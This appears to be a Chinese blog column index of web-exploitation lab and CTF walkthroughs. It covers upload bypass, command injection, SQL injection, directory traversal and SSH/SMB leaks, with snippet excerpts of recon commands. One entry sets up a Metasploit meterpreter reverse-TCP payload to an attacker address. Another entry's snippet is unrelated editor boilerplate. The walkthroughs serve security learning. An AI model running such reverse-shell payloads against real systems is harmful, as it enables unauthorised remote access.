Web漏洞利用
文章平均质量分 70
安全竞赛实战
平凡的学者
以红队为终极目标
展开
-
Burpsuite爆破之token值替换
burpsuite对token替换并进行暴力破解原创 2022-07-16 16:34:04 · 1657 阅读 · 1 评论 -
upload-labs通过教程
upload-labs通关前言PASS-01PASS-02PASS-03前言之所以写这篇文章,主要还是在现实的渗透测试中,我们还是很大几率能遇见文件上传漏洞的。遗憾的是很多时候我们即使遇到了上传点,但是因为一般的上传点多多少少都做了黑白名单的过滤,所以不是那么容易拿下shell的。因此这个靶场就是对文件上传漏洞的具体剖析,如果试完了所有的可能性还是不能成功拿shell,那证明这个上传点百分之八十都是安全的。PASS-01首先我们必须进行目录扫描去发现上传的目录dirsearch -u "http:原创 2022-02-24 16:06:12 · 4373 阅读 · 0 评论 -
暴力破解漏洞
暴力破解漏洞实现原理暴力破解的产生是由于服务器没有做限制,导致攻击者可以通过暴力的手段破解所需信息,如用户名、密码、验证码等。暴力破解需要一个庞大的字典,如4位数字的验证码,那么暴力破解的范围就是0000~9999,暴力破解的关键在于字典的大小。靶机搭建链接:https://pan.baidu.com/s/1Zw_huwIenjGTXUteftOuUw提取码:vuq6漏洞复现使用netdiscover发现存活主机netdiscover -i eth0使用nmap,nikto进行信息原创 2021-01-14 17:19:48 · 954 阅读 · 0 评论 -
命令注入漏洞(2)
命令注入漏洞(2)其实我们除了使用上述的EXP文件进行漏洞利用外,我们还可以使用著名的metasploit进行漏洞的利用有这些标志表明均是可以使用metasploit利用的漏洞打开msfconsole进行漏洞利用和监听msfconsoleset payload linux/x86/meterpreter_reverse_tcpset lhost 192.168.101.45exploit生成一个静荷用于实现shell反弹msfvenom -p linux/x86/me原创 2021-01-14 12:47:24 · 392 阅读 · 0 评论 -
命令注入漏洞(1)
命令注入漏洞原理其实命令注入漏洞也叫命令行注入漏洞,此漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入的参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。靶机搭建链接:https://pan.baidu.com/s/1W8kgkYPrHchakwy9kU6g7A提取码:9mm5漏洞复现使用netdiscover发现存活主机netdiscover -i eth0使用nmap对目标进行服务探测nmap -sV 192.168.101.46发现它只开放了8原创 2021-01-14 00:41:39 · 1313 阅读 · 1 评论 -
PUT中间件上传漏洞
先介绍一下PUT上传漏洞的原理我们常见的中间件有apache,tomcat,IIS,weblogic(其实就是web容器),这些中间件可以设置支持的HTTP方法。每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果中间件开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传webshell到对应的服务器上。靶机搭建链接:https://pan.baidu.com/s/1l_LILZgjUZ6ASrFQq9X22A提取码:lsq0漏洞复现使用netd原创 2021-01-13 22:01:05 · 2468 阅读 · 0 评论 -
命令执行漏洞
命令执行漏洞的原理应用程序有时需要调用一些执行系统命令的函数,如PHP中使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令。当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击。靶机搭建链接:https://pan.baidu.com/s/1b6j5sdFW8J4StSzRSvUqOw提取码:llku漏洞复现使用netdiscover发现存活主机netdiscover -i et原创 2021-01-12 19:22:44 · 918 阅读 · 1 评论 -
目录遍历漏洞
在开始之前,先介绍一下目录遍历漏洞的原理目录遍历漏洞原理比较简单,就是程序在实现上没有充分过滤用户输入的…/之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。这里的目录跳转符可以是…/,也可是…/的ASCII编码或者是unicode编码等。靶机链接:https://pan.baidu.com/s/1rkcs2rhBPch3Q5beSZJ4Rg提取码:20td漏洞复现过程使用netdiscover发现存活主机netdiscover -i eth0使用nmap原创 2021-01-04 20:42:37 · 8159 阅读 · 2 评论 -
SSI漏洞注入
在进行SSI漏洞注入之前,先介绍一下什么是SSI漏洞。SSI 注入全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。准备工作靶机地址:链接:https://pan.baidu.com/s/1MTunDny-m5eICXAS9P8ugA提取码:x3c2漏洞复现过程使用netdiscover发现存活主机netdidscover -i eth0使用n原创 2021-01-04 17:08:45 · 899 阅读 · 0 评论 -
sql之XFF注入
首先介绍一下X-Forward-For是什么东西X-Forwarded-For 是一个 HTTP 扩展头部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入 RFC 7239(Forwarded HTTP Extension)标准之中。准备工作开启靶场:这里我选用的是墨客的靶场漏洞复现过程先使用默认admin和原创 2021-01-03 13:50:35 · 813 阅读 · 0 评论 -
sql注入-post篇
打CTF比赛的时候,sql注入算是比较常见的题型,今天来记录一下基于靶机的post注入。准备工作靶机下载:链接:https://pan.baidu.com/s/1o8-25n0LtDTk2w_SgOT2og提取码:zlqz攻击过程使用netdiscover发现存活主机netdidscover -i eth0使用nmap进行主机服务检测发现目标主机开放了80、8080等端口使用nikto进行信息收集nikto -host http://192.168.101.34原创 2021-01-02 22:22:00 · 1255 阅读 · 0 评论 -
FTP服务后门利用
讲述一下FTP服务后门利用的过程吧准备工作镜像下载:链接:https://pan.baidu.com/s/1uC1GgXRl-q447B649hnx4A提取码:cyot攻击过程原创 2021-01-02 15:40:01 · 364 阅读 · 0 评论 -
SMB信息泄露提权
记录一下基于SMB信息泄露的提权过程准备工作镜像下载地址:链接:https://pan.baidu.com/s/1eKjpvhczXESM1K7mqDv6Tw提取码:bxps攻击过程使用netdiscover发现存活主机netdidscover -i eth0使用nmap扫描主机发现目标主机开放了远程连接端口和smb、mysql服务端口尝试登陆smb服务收集敏感信息,空指令登陆访问共享目录,一步步地收集敏感信息smbclient '\\192.168.75.153\p原创 2021-01-02 14:46:36 · 689 阅读 · 0 评论 -
SSH私钥泄露
记录一下CTF比赛的私钥泄露漏洞吧。镜像文件的下载地址链接:https://pan.baidu.com/s/1dXbjQavKtVw7gC4paH02ww提取码:9xh1SSH-私钥泄露使用netdiscover发现存活主机netdiscover -i eth0发现目标主机使用nmap收集目标主机信息。nmap -sV 192.168.75.152目标主机开放了22端口和http服务使用浏览器没有找到任何有用的信息。使用dirb探测web子目录。进行更深一原创 2021-01-02 01:01:05 · 608 阅读 · 0 评论 -
Born2root-SSH服务渗透
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar原创 2021-01-02 00:05:50 · 1223 阅读 · 1 评论